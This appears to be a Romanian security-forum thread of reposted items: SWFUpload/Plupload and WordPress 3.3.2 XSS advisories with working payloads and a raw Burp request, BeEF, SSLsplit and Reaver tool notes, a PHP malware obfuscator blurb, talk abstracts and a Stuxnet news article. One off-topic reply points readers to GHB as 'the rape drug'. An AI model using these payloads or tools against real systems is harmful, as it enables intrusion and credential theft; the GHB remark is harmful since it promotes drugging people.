Nytro

[h=2]XSS and CSRF via SWF Applets (SWFUpload, Plupload)[/h]Via: Defcamp [h=3]Summary[/h] Nathan Partlan and I discovered and reported vulnerabilities in two common Flash applets, SWFUpload and Plupload. SWFUpload’s developers have not released a fix for the XSS issue identified. Plupload’s developers have released v1.5.4 to address the identified CSRF issue. Both of these applets are present in WordPress installations. These vulnerabilities were addressed as part of WordPress 3.3.2. [h=3]Vulnerability #1: XSS in SWFUpload[/h] The latest version of SWFUpload (ActionScript code available here) contains the following code: // Get the movie name this.movieName = root.loaderInfo.parameters.movieName; // **Configure the callbacks** // The JavaScript tracks all the instances of SWFUpload on a page. We can access the instance // associated with this SWF file using the movieName. Each callback is accessible by making // a call directly to it on our instance. There is no error handling for undefined callback functions. // A developer would have to deliberately remove the default functions,set the variable to null, or remove // it from the init function. this.flashReady_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].flashReady"; this.fileDialogStart_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogStart"; this.fileQueued_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileQueued"; this.fileQueueError_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileQueueError"; this.fileDialogComplete_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogComplete"; this.uploadStart_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadStart"; this.uploadProgress_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadProgress"; this.uploadError_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadError"; this.uploadSuccess_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadSuccess"; this.uploadComplete_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadComplete"; this.debug_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].debug"; this.testExternalInterface_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].testExternalInterface"; this.cleanUp_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].cleanUp"; this.buttonAction_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].buttonAction"; Each of those callbacks is used as the first parameter to ExternalInterface.call, which executes JavaScript in the context of the current page. Since movieName is derived from user input (a Flash parameter) and a Flash applet can be loaded directly (with parameters in the URL), the Flash applet allows for reflected cross-site scripting. For sites where the applet is hosted on the same domain as the main website, this is a serious security concern. At this point, I’m not aware of a patched version of the applet source (let me know in the comments if there is one!). My suggestion would be to filter the movieName parameter so that only alpha-numeric characters are allowed. Proof of Concept: [URL="http://demo.swfupload.org/v220/swfupload/swfupload.swf?movieName=%22]%29;%7Dcatch%28e%29%7B%7Dif%28%21self.a%29self.a=%21alert%281%29;//"]http://demo.swfupload.org/v220/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//[/URL] [h=3]Vulnerability #2: CSRF in Plupload[/h] The Plupload applet called Security.allowDomain('*') to allow the applet to be used from any domain (so it could be served from S3, for instance). That meant people could interact with the Plupload applet from any other site on the Internet by embedding it on a page and using JavaScript. But due to the way the same-origin policy works in Flash, the applet could still make requests back to the domain on which it was hosted. In addition, people can specify the full URL for an upload request via JavaScript and the result of that request (ie: the HTML of the resulting page) is passed back via JavaScript to the embedding page. So, if an attacker could convince a target to interact with the applet (by selecting a single file to be uploaded), the attacker could make a request to the domain that the applet was hosted on and read back the full response. That could disclose CSRF tokens or other sensitive information. This issue was especially important for WordPress installations, where Plupload applets are hosted inside of the wp-includes directory by default. The issue was resolved by removing the call to Security.allowDomain('*') by default. [h=3]Conclusion[/h] Third-party Flash applets are vulnerable to many of the same sorts of attacks as other parts of web applications. However, they are often included in sites without a proper understanding of the security risks. Sursa: https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/

Carbylamine - A PHP Script Encoder to 'Obfuscate/Encode' PHP Files Posted by FlashcRew at 14:33 Via: Defcamp Carbylamine PHP Encoder is a PHP Encoder to 'Obfuscate/Encode' PHP File, Faster way to encode your malwares offline. How to use: carbylamine.php Download carbylamine Home project it's here Sursa: Carbylamine - A PHP Script Encoder to 'Obfuscate/Encode' PHP Files | fLaShcRew

[h=2]Wireshark: Listening to VoIP Conversations from Packet Captures[/h]Author: ~ by D. Dieterle on May 21, 2012. I have never done a lot with “Voice over IP” or VoIP systems, but ran into this today and thought it was pretty cool. A lot of telephones and communication devices now use VoIP to communicate over the internet. I was wondering how hard it would be to listen to a VoIP phone call if you had a packet capture that included the call. How hard would it be, I wondered, to scan a packet capture, find the calls and be able to somehow listen to the call. Well, come to find out, it is not hard at all. The feature is built into Wireshark! And they also include a file capture on their website so you can try it out. So…. Let’s do it! 1. Download the sample capture from Wireshark’s website. 2. Run Wireshark and open the packet capture. 3. Now all you need to do is go to the menu bar, select “Telephony” and the “VoIP Calls”: 4. Okay, a list of calls from the packet capture will show up. Pick the one you want to listen to, in this sample the first one is the only one that really has a conversation: 5. Okay, easy peasy, just select the call you want, click “Player” then “Decode”: 6. The player screen shows up and shows the Waveforms of the conversation. You will have two, one for each side of the call. You can listen to each side individually, or if you tick both check boxes you can listen to the conversation as it plays out: That’s it, if the VoIP conversation is in a protocol that WireShark understands, and is not encrypted, you can very simply isolate the call and listen to it via WireShark. As always, do not try these techniques on a network or on systems that you do not have permission to do so. Also, check your local laws regarding communication privacy and telephony before trying something like this in real life. Sursa: Wireshark: Listening to VoIP Conversations from Packet Captures

Naspa, mai bine cautati si voi GHB (drogul violului)

Bsides London 2012 David Rook: Windows Phone 7 platform and application security overview David Rook aka @SecurityNinja gives an overview on the Windows Phone 7 platform and application security overview at security Bsides London 2012 at the Barbican. The slides can be seen here: SecurityBSides London - windows phone 7

[h=1]Gavin Ewan - A salesmans guide to social engineering[/h] At Bsides London 2012, Gavin Ewan gives a Salesmans Guide to Social Engineering. Slides area available at: bit.ly/J3rVck Thanks to our media sponsors, Twist & Shout for recording our video on the day.

[h=1]Arron "Finux" Finnon[/h] At Bsides London 2012, Arron "Finux" Finnon presents UPnP - The Useful plug and pwn protocol - revisited

[h=1]Bsides London 2012, Robin Wood - "Breaking into Security"[/h] At Security Bsides London 2012, Robin (@digininja) Wood answers the oft-asked question of, "How do I get into information security" or "how do I become a pen tester" Videos thanks to our media sponsors Twist & Shout

[h=1]Bsides London 2012, Dave Hartley SAP Slapping A Pen Testers Guide[/h] At Bsides London 2012, Dave Hartley gives a pen testers guide to SAP. Slides can be downloaded from: SAP Slapping - MWR Labs Thanks to our media sponsors Twist & Shout for the videos on the day

[h=1]BeEF 0.4.3.5![/h]by Mayuresh on June 5, 2012 Our first post regarding BeEF can be found here. A few hours, an updated version – BeEF version 0.4.3.5 – has was made available to us! “BeEF, the Browser Exploitation Framework is a professional security tool provided for lawful research and testing purposes. It allows the experienced penetration tester or system administrator additional attack vectors when assessing the posture of a target. The user of BeEF will control which browser will launch which exploit and at which target. BeEF hooks one or more web browsers as beachheads for the launching of directed exploits in real-time. Each browser is likely to be within a different security context. This provides additional vectors that can be exploited by security professionals. BeEF provides an easily integratable framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Development has focused on creating a modular framework. This has made module development a very quick and simple process. Current modules include Metasploit, port scanning, keylogging, TOR detection and more.“ [h=2]Changes made to BeEF 0.4.3.5:[/h] Experimental support for WebSockets as an alternative communication channel has been added. The server-side handlers are event-based for performance reasons, and right now it works smoothly in Chrome/Safari and Firefox latest versions. To give it a try, modify beef.http.websocket.enable to true in the main config.yaml file. Using WebSockets the communication is much faster, especially when dealing with large requests (Tunneling Proxy) or an high number of command modules. The WebSockets work is a joint effort between Graziano Felline and Michele. Experimental support for obfuscation has also been added. Disabled by default, enable the extension at beef.extension.evasion.enable at the end of the main config.yaml file if you want to play with it. The purpose of the extension is to reduce the likelihood that the BeEF hook will be detected by RegEx’es and Layer 7 filters. Obviously a manual analysis (a la sla.ckers) will reveal the goodness, but still the extension enables you to combine and chain multiple techniques as you most like it. Right now, when enabled, the main hook file and the code sent with modules is scrambled (random string substitution), minified and base64?ed. A couple of XSRF modules for the Huawei SmartAX MT880 router and the Dlink DCS series camera were added. The Deface Web Page module was updated to change the page title and favicon. The first BeEF clickjacking module that can be used as a template for more specific attacks: an invisible iframe follows the mouse cursor. Right now, this works in Firefox and Chrome, but not yet in Internet Explorer. A Cross-Site Printing (XSP) module that allows you to print to printers with port 9100 open has also been added. By default, this prints BeEF ASCII art. As with the social engineering modules, a module that prompts the user to install a fake Flash player update which is really a malicious Chrome extension has also been added. This is very nice because the extension can issue CrossDomain requests, have access to tabs, and be the launch point for other modules: Inject BeEF in all tabs, steal Google contacts, or a new one Mike added recently to steal all cookies from all tabs, including those marked with the HttpOnly flag. A Mobile Safari iOS 5.1 Address Bar Spoofing module, the Glassfish WAR upload module through XSRF, the frame sniffing module using LeakyFrame, the Heretic Clippy code and a Netgear GS108T managed switch XSRF module have also been added. All thanks to Bart Leppens, Nick Freeman, Denis Andzakovic, Christian Frichot, Mike Haworth, Brendan and Antisnatchor! [h=3]Download BeEF 0.4.3.5:[/h] BeEF 0.4.3.5 - beef-latest-alpha.tar.gz/beef-0.4.3.5.zip – https://github.com/beefproject/beef/zipball/beef-0.4.3.5 Sursa: BeEF version 0.4.3.5! — PenTestIT

Science of Cyber-Security JASON The MITRE Corporation 7515 Colshire Drive McLean, Virginia 22102-7508 (703) Contact: D, McMorrow - dmcmorro w@mi tre.org November 2010 Approved for public release; distribution unlimited Contents 1 EXECUTIVE SUMMARY 1 2 PROBLEM STATEMENT AND INTRODUCTION 9 3 CYBER-SECURITY AS SCIENCE – An Overview 13 3.1 Attributes for Cyber-Security . . . . . . . . . . . . . . . . . . . . 14 3.2 Guidance from other Sciences . . . . . . . . . . . . . . . . . . . 15 3.2.1 Economics . . . . . . . . . . . . . . . . . . . . . . . . . 16 3.2.2 Meteorology . . . . . . . . . . . . . . . . . . . . . . . . 16 3.2.3 Medicine . . . . . . . . . . . . . . . . . . . . . . . . . . 17 3.2.4 Astronomy . . . . . . . . . . . . . . . . . . . . . . . . . 17 3.2.5 Agriculture . . . . . . . . . . . . . . . . . . . . . . . . . 18 3.3 Security Degrades Over Time . . . . . . . . . . . . . . . . . . . . 18 3.3.1 Unix passwords . . . . . . . . . . . . . . . . . . . . . . . 18 3.3.2 Lock bumping . . . . . . . . . . . . . . . . . . . . . . . 19 3.4 The Role of Secrecy . . . . . . . . . . . . . . . . . . . . . . . . . 20 3.5 Aspects of the Science of Cyber-Security . . . . . . . . . . . . . 22 3.6 Some Science . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 3.6.1 Trust . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 3.6.2 Cryptography . . . . . . . . . . . . . . . . . . . . . . . . 23 3.6.3 Game theory . . . . . . . . . . . . . . . . . . . . . . . . 24 3.6.4 Model checking . . . . . . . . . . . . . . . . . . . . . . . 26 3.6.5 Obfuscation . . . . . . . . . . . . . . . . . . . . . . . . . 26 3.6.6 Machine learning . . . . . . . . . . . . . . . . . . . . . . 27 3.6.7 Composition of components . . . . . . . . . . . . . . . . 27 3.7 Applying the Fruits of Science . . . . . . . . . . . . . . . . . . . 28 3.8 Metrics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31 3.9 The Opportunities of New Technologies . . . . . . . . . . . . . . 32 3.10 Experiments and Data . . . . . . . . . . . . . . . . . . . . . . . . 34 4 MODEL CHECKING 37 4.1 Brief Introduction to Spin and Promela . . . . . . . . . . . . . . . 38 4.2 Application to Security . . . . . . . . . . . . . . . . . . . . . . . 42 4.2.1 The Needham-Schroeder Protocol . . . . . . . . . . . . . 43 4.2.2 Promela model of the protocol . . . . . . . . . . . . . . . 45 4.3 Scaling Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 iii 4.4 Extracting Models from Code . . . . . . . . . . . . . . . . . . . 52 4.5 Relationship to Hyper-Properties . . . . . . . . . . . . . . . . . . 53 5 THE IMMUNE SYSTEM ANALOGY 65 5.1 Basic Biology . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 5.2 Learning from the Analogy . . . . . . . . . . . . . . . . . . . . . 68 5.2.1 The need for adaptive response . . . . . . . . . . . . . . . 69 5.2.2 A mix of sensing modalities . . . . . . . . . . . . . . . . 70 5.2.3 The need for controlled experiments . . . . . . . . . . . . 71 5.2.4 Time scale differences . . . . . . . . . . . . . . . . . . . 73 5.2.5 Responses to detection . . . . . . . . . . . . . . . . . . . 74 5.2.6 Final points . . . . . . . . . . . . . . . . . . . . . . . . . 75 6 CONCLUSIONS AND RECOMMENDATIONS 77 A APPENDIX: Briefers 85 Download: http://www.fas.org/irp/agency/dod/jason/cyber.pdf

Firefox 13 [h=1]Firefox Has a Redesigned Home Page and New Tab Experience That Make Browsing the Web Faster and Easier[/h] June 5th, 2012 · Firefox Firefox makes it faster and easier to get where you want to go on the Web with a redesigned Home Page and New Tab experience. The Home Page now includes icons at the bottom of the page to give you easy access to bookmarks, history, settings, add-ons, downloads and sync preferences with one-click shortcuts. When you open a new tab, you’ll see thumbnails of your most recently and frequently visited sites. You can customize the New Tab page by adding or removing thumbnails based on where you go most. Click the screenshot to learn more! Firefox loads tabs on demand when restoring a browsing session to more quickly get you to Web pages. Firefox first loads the tab you are currently viewing, then loads background tabs when you click them. It’s an improvement that makes Firefox start faster and use less memory. This is just one of a series of performance improvements to Firefox responsiveness. Firefox supports SPDY by default to make browsing more secure. SPDY is a protocol designed as a successor to HTTP that reduces the amount of time it takes for websites to load. You will notice faster page load times on sites that support SPDY networking, like Google and Twitter. With this support, Firefox is available to an estimated 15 million native Khmer speakers around the world, in addition to the millions that already use Firefox in more than 85 languages worldwide. For more information: Download Firefox for Windows, Mac and Linux Firefox for Windows, Mac and Linux detailed release notes Sursa: Firefox Has a Redesigned Home Page and New Tab Experience That Make Browsing the Web Faster and Easier | The Mozilla Blog

SSLsplit - Transparent and Scalable SSL/TLS Interceptor SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. It terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing. SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, it generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. It can also use existing certificates of which the private key is available, instead of generating forged ones. SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way. SSLsplit supports a number of NAT engines, static forwarding and SNI DNS lookups to determine the original destination of redirected connections. SSLsplit currently supports the following NAT engines: OpenBSD packet filter (pf) – also available on FreeBSD and NetBSD FreeBSD IP firewall (IPFW) – also available on Mac OS X IPFilter (ipfilter, ipf), available on many systems, including FreeBSD, NetBSD, Linux and Solaris Linux netfilter (netfilter) Linux netfilter using the iptables TPROXY (tproxy) Download Sslsplit 0.4.4 Sursa: SSLsplit - Transparent and Scalable SSL/TLS Interceptor | Security, Hacking and Penetration Testing Tools

Reaver v1.4 - WPS Brute force attack against Wifi The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours. Screenshot: http://2.bp.blogspot.com/-x1sTEFZqpvU/T85ITbIGQ3I/AAAAAAAAGfE/Dqh7dgJUGvY/s1600/Reaver+v1.4+-+WPS+Brute+force+attack+against+Wifi.jpg Usage is simple; just specify the target BSSID and the monitor mode interface to use: # reaver -i mon0 -b 00:01:02:03:04:05 For those interested, there is also a commercial version available with more features and speed improvements. On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. Download Reaver v1.4 Sursa: SSLsplit - Transparent and Scalable SSL/TLS Interceptor | Security, Hacking and Penetration Testing Tools

Windows 7, powerful malware, "open-source", Fully UnDetectable: PowerShell

WordPress 3.3.2 Cross Site Scripting Authored by old man WordPress version 3.3.2 suffers from double-encoding cross site scripting vulnerability that bypasses the filter for protection. There is a persistent XSS vulnerability in the wordpress version 3.3.2. However, the severity of this finding is very LOW. The detail is as follow, a) Login into an admin account Navigate to Links -> Links Categories c) Fill up the required details and intercept the request with a BURP suite. d) The injectable parameter is slug. If you inject <script>alert(1)</script> as a value to parameter "slug", the application strips it off and the value becomes alert1. But if the payload is double encode then ;-) <script>alert(1)</script> when converted to %253cscript%253ealert%25281%2529%253c%252fscript%253e bypasses xss protection. The following request shows the raw burp request along with the vulnerable parameter and payload marked in bold. BURP REQUEST POST /wordpress/wp-admin/edit-tags.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://localhost/wordpress/wp-admin/edit-tags.php?action=edit&taxonomy=link_category&tag_ID=2&post_type=post Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C197b22093eaefaf6950bd81d6aa6372b; wp-settings-time-1=1335371272; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C6ebcb9d0104a37c6d7a91274ac94c6cb Content-Type: application/x-www-form-urlencoded Content-Length: 379 action=editedtag&tag_ID=2&taxonomy=link_category&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dlink_category&_wpnonce=83974d7f8f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Faction%3Dedit%26taxonomy%3Dlink_category%26tag_ID%3D2%26post_type%3Dpost&name=Blogroll&slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&description=sectest&submit=Update Sursa: WordPress 3.3.2 Cross Site Scripting ? Packet Storm

De ce am impresia ca era o porcarie?

Da, poate, astfel de oameni idolatrizez.

[h=1]nullcon Goa 2012: HaxdroiD Empowering Handsets - By Anant & Pardhu[/h] As already proven by the recent trends the next wave will be the mobile computing wave and so will be the shift of platform for penetration testing. Although android is targeted as next generation computing platform it still lacks the capability to perform VA / PT / ethical hacking on it. If we look at the android market we find it lacking in lots of terms, not much of a tool set available and not much of documentation availability online too. This paper will discuss various options that are available for converting an innocent android handset to a penetration testing platform. This talk will evaluate the current scenario and also present with various options that are available for people. Not just about existing tool set, we will also be exploring ways and means to explore and exploit the android platform to the limits. We will also be publishing a customized android ROM which is a direct attack platform. It will have advance feature set pre-configured and ready to use saving large efforts of security researchers. (This ROM will be published to two different handset models however will have options to be ported to just about any handset/tablet which can handle the load. Sursa: nullOxOO - YouTube

[h=1]nullcon Goa 2012: Attacking Backup Software - By Nibin Varghese[/h] Backup software is a valuable asset for any organization. These softwares runs on a large number of systems in an enterprise. The main functionality for these softwares is to provide back up and recovery options for the critical data that belongs to the enterprise. The hosts requiring these back up services communicates with a back up server over the network. The different modes of operations between the server and client would be a pull model where the server connects to the client or a push model where the client connects to the server. If the communication between the server and client is not validated properly, there can be different vectors of attack that can be conducted on these softwares. This paper would explain an attack on Symantec Back-up softwares (CVE-2011-0546, BID:47824) where it was possible to do a man in the middle attack to steal information from host machines. The bug was very critical and complex as it affected a major architectural flaw of the application on how it validated the host machines before a back up operation was initiated. Sursa: nullOxOO - YouTube

[h=1]nullcon Goa 2012: IVR Security Internal Network Attacks via Phone - By Rahul Sasi[/h] The following research is on IVR (Interactive Voice Response) systems which are currently used in Phone Banking, Call centers, Hospitals and corporate mainly for information retrieval and Remote Management via Telephone lines. The paper explains a serious of security issues concerning these systems (IVR) and exploitation techniques and ways of carrying out attacks on internal network via Telephone lines. A demonstration of few exploits on IVR systems and a real incident about a critical responsibly disclosed banking flow in its Phone Banking System would be done. Sursa: nullOxOO - YouTube

[h=1]nullcon Goa 2012: Binary God - By Atul Alex[/h] Talk is about Abstract Processor named Aod8 designed by Atul. The idea is to emulate at programming level an abstract design. The objective of this research was to understand the basics of designing a processor architecture, creating a custom Assembler for this Architecture to write programs for it, writing your own debugger & creating a highly basic Operating System for it. speaker will be demonstrating the tools that he has created for the same, explain how he wrote the Operating System.. the idea behind writing the debugger & the Assembler.Concepts of handling the memory & bypassing size-limitations of the architecture. Sursa: nullOxOO - YouTube

[h=1]nullcon Goa 2012: Attacking and Defending the Smart Grid - By Justin Searle[/h] The Smart Grid brings greater benefits for electric utilities and customer alike, however these benefits come at a cost from a security perspective. Unlike the over-hyped messages we usually hear from the media, the sky is NOT falling. However, just like any other technology, the systems and devices that make up the Smart Grid will have weaknesses and vulnerabilities. It is important for us to understand these vulnerabilities, how they can be attacked, and what we need to do to defend against those attacks. This presentation will explore the architecture of most Smart Meters, explain the methodologies developed to perform penetration testing on them, enumerate the types of vulnerabilities we commonly find, and discuss the solutions/recommendation. Sursa: nullOxOO - YouTube

Interesant: http://www.nytimes.com/interactive/2012/06/01/world/middleeast/how-a-secret-cyberwar-program-worked.html?src=tp

[h=1]Obama Order Sped Up Wave of Cyberattacks Against Iran[/h][h=6]By DAVID E. SANGER[/h] [h=6]Published: June 1, 2012[/h] WASHINGTON — From his first months in office, President Obama secretly ordered increasingly sophisticated attacks on the computer systems that run Iran’s main nuclear enrichment facilities, significantly expanding America’s first sustained use of cyberweapons, according to participants in the program. Mr. Obama decided to accelerate the attacks — begun in the Bush administration and code-named Olympic Games — even after an element of the program accidentally became public in the summer of 2010 because of a programming error that allowed it to escape Iran’s Natanz plant and sent it around the world on the Internet. Computer security experts who began studying the worm, which had been developed by the United States and Israel, gave it a name: Stuxnet. At a tense meeting in the White House Situation Room within days of the worm’s “escape,” Mr. Obama, Vice President Joseph R. Biden Jr. and the director of the Central Intelligence Agency at the time, Leon E. Panetta, considered whether America’s most ambitious attempt to slow the progress of Iran’s nuclear efforts had been fatally compromised. “Should we shut this thing down?” Mr. Obama asked, according to members of the president’s national security team who were in the room. Told it was unclear how much the Iranians knew about the code, and offered evidence that it was still causing havoc, Mr. Obama decided that the cyberattacks should proceed. In the following weeks, the Natanz plant was hit by a newer version of the computer worm, and then another after that. The last of that series of attacks, a few weeks after Stuxnet was detected around the world, temporarily took out nearly 1,000 of the 5,000 centrifuges Iran had spinning at the time to purify uranium. This account of the American and Israeli effort to undermine the Iranian nuclear program is based on interviews over the past 18 months with current and former American, European and Israeli officials involved in the program, as well as a range of outside experts. None would allow their names to be used because the effort remains highly classified, and parts of it continue to this day. These officials gave differing assessments of how successful the sabotage program was in slowing Iran’s progress toward developing the ability to build nuclear weapons. Internal Obama administration estimates say the effort was set back by 18 months to two years, but some experts inside and outside the government are more skeptical, noting that Iran’s enrichment levels have steadily recovered, giving the country enough fuel today for five or more weapons, with additional enrichment. Whether Iran is still trying to design and build a weapon is in dispute. The most recent United States intelligence estimate concludes that Iran suspended major parts of its weaponization effort after 2003, though there is evidence that some remnants of it continue. Iran initially denied that its enrichment facilities had been hit by Stuxnet, then said it had found the worm and contained it. Last year, the nation announced that it had begun its own military cyberunit, and Brig. Gen. Gholamreza Jalali, the head of Iran’s Passive Defense Organization, said that the Iranian military was prepared “to fight our enemies” in “cyberspace and Internet warfare.” But there has been scant evidence that it has begun to strike back. The United States government only recently acknowledged developing cyberweapons, and it has never admitted using them. There have been reports of one-time attacks against personal computers used by members of Al Qaeda, and of contemplated attacks against the computers that run air defense systems, including during the NATO-led air attack on Libya last year. But Olympic Games was of an entirely different type and sophistication. It appears to be the first time the United States has repeatedly used cyberweapons to cripple another country’s infrastructure, achieving, with computer code, what until then could be accomplished only by bombing a country or sending in agents to plant explosives. The code itself is 50 times as big as the typical computer worm, Carey Nachenberg, a vice president of Symantec, one of the many groups that have dissected the code, said at a symposium at Stanford University in April. Those forensic investigations into the inner workings of the code, while picking apart how it worked, came to no conclusions about who was responsible. A similar process is now under way to figure out the origins of another cyberweapon called Flame that was recently discovered to have attacked the computers of Iranian officials, sweeping up information from those machines. But the computer code appears to be at least five years old, and American officials say that it was not part of Olympic Games. They have declined to say whether the United States was responsible for the Flame attack. Mr. Obama, according to participants in the many Situation Room meetings on Olympic Games, was acutely aware that with every attack he was pushing the United States into new territory, much as his predecessors had with the first use of atomic weapons in the 1940s, of intercontinental missiles in the 1950s and of drones in the past decade. He repeatedly expressed concerns that any American acknowledgment that it was using cyberweapons — even under the most careful and limited circumstances — could enable other countries, terrorists or hackers to justify their own attacks. “We discussed the irony, more than once,” one of his aides said. Another said that the administration was resistant to developing a “grand theory for a weapon whose possibilities they were still discovering.” Yet Mr. Obama concluded that when it came to stopping Iran, the United States had no other choice. If Olympic Games failed, he told aides, there would be no time for sanctions and diplomacy with Iran to work. Israel could carry out a conventional military attack, prompting a conflict that could spread throughout the region. A Bush Initiative The impetus for Olympic Games dates from 2006, when President George W. Bush saw few good options in dealing with Iran. At the time, America’s European allies were divided about the cost that imposing sanctions on Iran would have on their own economies. Having falsely accused Saddam Hussein of reconstituting his nuclear program in Iraq, Mr. Bush had little credibility in publicly discussing another nation’s nuclear ambitions. The Iranians seemed to sense his vulnerability, and, frustrated by negotiations, they resumed enriching uranium at an underground site at Natanz, one whose existence had been exposed just three years before. Iran’s president, Mahmoud Ahmadinejad, took reporters on a tour of the plant and described grand ambitions to install upward of 50,000 centrifuges. For a country with only one nuclear power reactor — whose fuel comes from Russia — to say that it needed fuel for its civilian nuclear program seemed dubious to Bush administration officials. They feared that the fuel could be used in another way besides providing power: to create a stockpile that could later be enriched to bomb-grade material if the Iranians made a political decision to do so. Hawks in the Bush administration like Vice President Dick Cheney urged Mr. Bush to consider a military strike against the Iranian nuclear facilities before they could produce fuel suitable for a weapon. Several times, the administration reviewed military options and concluded that they would only further inflame a region already at war, and would have uncertain results. For years the C.I.A. had introduced faulty parts and designs into Iran’s systems — even tinkering with imported power supplies so that they would blow up — but the sabotage had had relatively little effect. General James E. Cartwright, who had established a small cyberoperation inside the United States Strategic Command, which is responsible for many of America’s nuclear forces, joined intelligence officials in presenting a radical new idea to Mr. Bush and his national security team. It involved a far more sophisticated cyberweapon than the United States had designed before. The goal was to gain access to the Natanz plant’s industrial computer controls. That required leaping the electronic moat that cut the Natanz plant off from the Internet — called the air gap, because it physically separates the facility from the outside world. The computer code would invade the specialized computers that command the centrifuges. The first stage in the effort was to develop a bit of computer code called a beacon that could be inserted into the computers, which were made by the German company Siemens and an Iranian manufacturer, to map their operations. The idea was to draw the equivalent of an electrical blueprint of the Natanz plant, to understand how the computers control the giant silvery centrifuges that spin at tremendous speeds. The connections were complex, and unless every circuit was understood, efforts to seize control of the centrifuges could fail. ........................ Articol complet: http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1